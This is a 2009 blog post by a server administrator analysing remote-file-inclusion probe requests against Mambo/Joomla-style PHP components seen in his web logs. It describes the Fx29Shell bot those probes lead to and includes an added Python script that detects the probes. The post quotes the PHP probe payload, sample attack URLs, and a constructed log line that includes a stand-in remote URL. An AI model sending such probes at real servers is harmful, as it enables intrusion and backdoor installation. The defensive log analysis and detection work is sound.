Somebody in Denmark thought something in ... / 2009-11-19

Somebody in Denmark thought something in this webserver would run some default and vulnerable software and tried to find a hole:
$ grep -c ~httpd/idefix/logs/access_log
All tries to display which is a bit of PHP source:
<?php /* ZFxID */ echo("Shiro"."Hige"); die("Shiro"."Hige"); /* ZFxID */ ?>
Which will display ShiroHige as one word when run through the php processor.

All URLs are attempts that assume some vulnerable script sits behind a visible part of the site, such as the root, my homepage, or some part of my homepage. Samples:

GET //?mosConfig_absolute_path=%0D
GET /~koos//?mosConfig_absolute_path=%0D
GET /~koos//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=%20%0D
GET /~koos/newsitem.cgi//?mosConfig_absolute_path=%0D
GET /~koos/newsitem.cgi//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=%20%0D
GET /~koos/newstag.cgi/security%20%20//libraries/pcl/pcltar.php?g_pcltar_lib_dir=%20
GET /~koos/newstag.cgi/security%20%20//templates/be2004-2/index.php?mosConfig_absolute_path=%20%0D
GET /~koos/newstag.cgi/security%20%20//modules/mod_weather.php?absolute_path=%20%0D
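
One way to spot this kind of probe in an Apache access log, as an added example that is not part of the original post: it flags the parameter names from the samples above when their decoded value is blank, a bare control character, or a remote URL. The log lines, client addresses, status codes and the example.invalid URL are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameter names taken from the sample requests on this page.
INCLUDE_PARAMS = {"mosConfig_absolute_path", "mosConfig_live_site",
                  "g_pcltar_lib_dir", "absolute_path"}

# Apache common/combined log line: host ident user [time] "request" status ...
LOG_RE = re.compile(r'^(?P<host>\S+) \S+ \S+ \[[^\]]*\] '
                    r'"[A-Z]+ (?P<target>\S+)[^"]*" (?P<status>\d{3}) ')

def classify(value):
    """Return why a decoded parameter value looks like a probe, or None."""
    if re.match(r"\s*(https?|ftp)://", value, re.IGNORECASE):
        return "remote-url"
    if value.strip() == "":      # empty, spaces or a bare CR, as in the samples
        return "blank-or-control"
    return None

def scan(lines):
    """Yield (host, status, parameter, reason) for each suspicious parameter."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                     # not a request line we understand
        query = urlsplit(m.group("target")).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            reason = classify(value) if name in INCLUDE_PARAMS else None
            if reason:
                yield m.group("host"), int(m.group("status")), name, reason

# Constructed log lines: addresses, timestamps, status codes and the
# example.invalid URL are made up; the request paths follow the samples above.
SAMPLE = [
    '192.0.2.10 - - [19/Nov/2009:10:00:01 +0100] "GET //?mosConfig_absolute_path=%0D HTTP/1.1" 200 5120',
    '192.0.2.10 - - [19/Nov/2009:10:00:02 +0100] "GET /~koos/newstag.cgi/security%20%20//libraries/pcl/pcltar.php?g_pcltar_lib_dir=%20 HTTP/1.1" 200 7311',
    '203.0.113.7 - - [19/Nov/2009:10:05:40 +0100] "GET /index.php?mosConfig_absolute_path=http://example.invalid/probe.txt? HTTP/1.1" 404 209',
    '198.51.100.3 - - [19/Nov/2009:10:06:00 +0100] "GET /~koos/ HTTP/1.1" 200 9000',
    '198.51.100.3 - - [19/Nov/2009:10:06:05 +0100] "GET /~koos/newsitem.cgi?absolute_path=/home/koos HTTP/1.1" 200 4100',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(*hit)
```

A 200 status on a flagged line only means the server answered the request; whether any script behind that URL actually acts on the parameter has to be checked in the application itself.
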
A bit of research finds that the next bit of code to execute would try to get info on the PHP setup (OS, rights, free disk space). The third bit is running an entire bot with a few backdoors. I tried to find where the backdoor would connect to, but that is all dynamic: only when the third script is loaded via the vulnerability are a number of variables set with the IP and port to connect to.

Like any good bot, it also notifies its maker in a hidden away part of its source, which would look like:

Subject: Fx29Shell by

Boss, there was an injected target on by
Searching on the term Fx29Shell gives a scary answer: Results 1 - 10 of about 221,000 for Fx29Shell. A lot of those still show webservers where this script is active.

But all my home-made webstuff is not in the habit of executing remote php scripts. But given the load of sites hosted on it's probably a script running on that server which got hacked from a third place.


Koos van den Hout, PGP key 5BA9 368B E6F3 34E4